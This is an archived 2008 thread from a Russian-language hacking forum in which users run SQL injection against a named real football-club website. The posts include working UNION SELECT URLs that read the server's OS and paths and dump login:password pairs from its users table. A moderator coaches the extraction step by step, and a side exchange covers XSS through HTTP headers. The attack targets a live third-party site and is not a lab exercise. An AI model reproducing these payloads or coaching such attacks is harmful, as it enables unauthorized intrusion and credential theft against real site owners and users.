ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
10.04.2008, 10:28
|
|
Познающий
Регистрация: 07.03.2008
Сообщений: 41
Провел на форуме:
572900
Репутация:
17
|
|
Знающие люди,кому не сложно помочь,стукните в 380-225-866
P.S. Статью [ cash ] 'a уже до дыр зачитал.Не могу выполнить ни одно из действий,описанных там,т.к.постоянно выдаётся ошибка "Incorrect syntax near <оператор>"
Последний раз редактировалось SQL~In[J]ecTi0n; 10.04.2008 в 11:18..
|
|
|
10.04.2008, 13:42
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
Сообщение от +toxa+
Ухты! Как много ты умных слов ты знаешь. Не можешь отличить активку от пассивки, а уже xss через HTTP заголовок замутил. TRACE бесполезный? А если на сайте куки с атрибутом httpOnly? Эту пассивку можно нормально использовать (с токи зрения жертвы) только через swf или через отправку пакета через XMLHttpRequest
Необязательно.
Лучше бы сказал как, или привёл бы пример работающего пост запроса с параметрами.
|
|
|
|
10.04.2008, 15:08
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
А что если при запросе из таблицы users по клонкам login,pass вернулось 'void  ass'
База пустая чтоли? :Р Версия бд 4.1.18
Warning: getimagesize(6): failed to open stream: No such file or directory in /www/anthost/www/htdocs/fc-anji/news.php on line 141
Query failed: Illegal mix of collations (cp1251_general_ci,IMPLICIT) and (utf8_general_ci,SYSCONST) for operation 'UNION'
использовал знаменитый алгоритм шифрования AES:РРР
http://www.fc-anji.ru/news.php?id=-230+union+select+1,aes_decrypt(aes_encrypt(@@versi on_compile_os,0x71),0x71),3,4,5,6/*
portbld-freebsd5.4
http://www.fc-anji.ru/news.php?id=-230+union+select+1,aes_decrypt(aes_encrypt(@@based ir,0x71),0x71),3,4,5,6/*
Тут неполучилось:Р,с одним @ тоже))
Последний раз редактировалось Велемир; 10.04.2008 в 15:13..
|
|
|
|
10.04.2008, 15:17
|
|
Moderator - Level 7
Регистрация: 24.02.2006
Сообщений: 447
Провел на форуме:
2872049
Репутация:
705
|
|
Лучше бы сказал как, или привёл бы пример работающего пост запроса с параметрами.
иди доки лучше по читай, здесь никто никому ничего не должен объснять или показывать.
А что если при запросе из таблицы users по клонкам login,pass вернулось voidass
База пустая чтоли? :Р Версия бд 4.1.18
Если что-то вернулось значит не пусто, используй объединение concat или concat_ws с разделителем можно просто :, а можно в хексе.
concat(user,':',pass)
concat_ws(0x3a,user,pass)
|
|
|
|
10.04.2008, 15:30
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
http://www.fc-anji.ru/news.php?id=1+union+select+1,concat_ws(0x3a,login, pass),3,4,5,6+from+users/*
Та же ошибка, но вернулось всё то же самое, что и при предыдущем запросе:
void: pass ))))))
Самое интересное, что если использовать лимит и подставить 0,1 , то и вернёт void: pass.Дальше не возвращает ).Мошь он нуль и возвращает?:Р Или это какой-то новый способ защиты ?))))
Да,и вот ещё что: доступа к mysql.user и information?schema.tables нету (
Последний раз редактировалось Велемир; 10.04.2008 в 15:38..
|
|
|
|
10.04.2008, 16:12
|
|
Moderator - Level 7
Регистрация: 24.02.2006
Сообщений: 447
Провел на форуме:
2872049
Репутация:
705
|
|
Сообщение от Велемир
http://www.fc-anji.ru/news.php?id=1+union+select+1,concat_ws(0x3a,login, pass),3,4,5,6+from+users/*
Та же ошибка, но вернулось всё то же самое, что и при предыдущем запросе:
void: pass ))))))
Самое интересное, что если использовать лимит и подставить 0,1 , то и вернёт void: pass.Дальше не возвращает ).Мошь он нуль и возвращает?:Р Или это какой-то новый способ защиты ?))))
Да,и вот ещё что: доступа к mysql.user и information?schema.tables нету (
все правильно при таком запросе у тя будет
http://www.fc-anji.ru/news.php?id=1+union+select+1,concat_ws(0x3b,login, pass),3,4,5,6+from+users+limit+0,1/*
void;pass -> login: void pass: pass
0x3b -> разделитель ;
больше записей в users нету поэтому пустой рез.
доступа к mysql.user и information?schema.tables нету
Версия бд 4.1.18
Ну нет доступа это обычное дело, правильно права выставлены.
|
|
|
|
10.04.2008, 16:19
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
Кто-то постарался знач : ) Пасип что разъяснил:Р
Последний раз редактировалось Велемир; 10.04.2008 в 16:23..
|
|
|
|
10.04.2008, 16:21
|
|
Постоянный
Регистрация: 10.11.2006
Сообщений: 416
Провел на форуме:
5636868
Репутация:
849
|
|
information_schema присутствует с версии 5 и далее
|
|
|
|
10.04.2008, 16:24
|
|
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
Провел на форуме:
9751379
Репутация:
3812
|
|
Сообщение от Велемир
Лучше бы сказал как, или привёл бы пример работающего пост запроса с параметрами.
В интернете мало доков по http? Скачай себе http intruder, там есть конструктор пакетов =\
__________________
|
|
|
|
10.04.2008, 16:24
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
Сообщение от Basurman
information_schema присутствует с версии 5 и далее
Хыхы,а я и забыл ))))
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для SQL~In[J]ecTi0n](/avatars/avatar51654.jpg?649737){kind=avatar}
Линейный вид
